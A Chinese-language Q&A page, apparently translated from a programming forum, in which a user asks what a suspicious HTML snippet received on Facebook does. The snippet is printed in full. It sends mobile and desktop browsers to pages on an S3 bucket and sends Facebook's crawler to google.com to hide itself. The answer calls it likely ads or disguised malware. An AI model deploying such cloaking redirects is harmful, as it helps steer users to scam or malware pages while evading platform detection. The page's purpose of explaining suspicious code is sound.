HTML 中未转义的字符串

Unescaped String in HTML

本文关键字:字符串 转义 HTML      更新时间:2023-09-26

这是在嵌入HTML的Facebook上发送给我的。 我没有打开它,因为我怀疑它。谁能告诉我它的作用?

问题陈述:这是使用document.write(unescape('<something here>');编写的 我逃脱了这一点。

`<script type="text/javascript"> // <![CDATA[
if ( (navigator.userAgent.indexOf('Android') != -1) ) {
document.location = "http://s3.amazonaws.com/video-asntjhwert/s.html";
} // ]]>
</script>     
<script language=javascript>
if((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i)))
{
location.replace("http://s3.amazonaws.com/video-asntjhwert/s.html");
}
</script>
 <body>
<script>

if (navigator['userAgent']['indexOf']('Firefox') != -1) {
    window['location'] = 'https://s3.amazonaws.com/video-asntjhwert/index.html';
} else {
    if (navigator['userAgent']['indexOf']('Facebook Bot') != -1) {
        window['location'] = 'http://google.com/';
    } else {
        if (navigator['userAgent']['indexOf']('Chrome') != -1) {
            window['location'] = 'https://s3.amazonaws.com/video-asntjhwert/index.html';
            } else {
            window['location'] = 'http://s3.amazonaws.com/video-asntjhwert/s.html';
        };
    };
};
</script>
</body>'));

'

第一部分检查您使用的是哪个移动操作系统 Android或iOS,而第二部分寻找 PC 浏览器,它们之间有一个共同点,它会将您重定向到一个网页,该网页可能托管在 AWS 服务器上,并且可能是视频,您可以得出结论,它主要是广告!但请注意,它可能是伪装的恶意软件,也是由某些人注入的!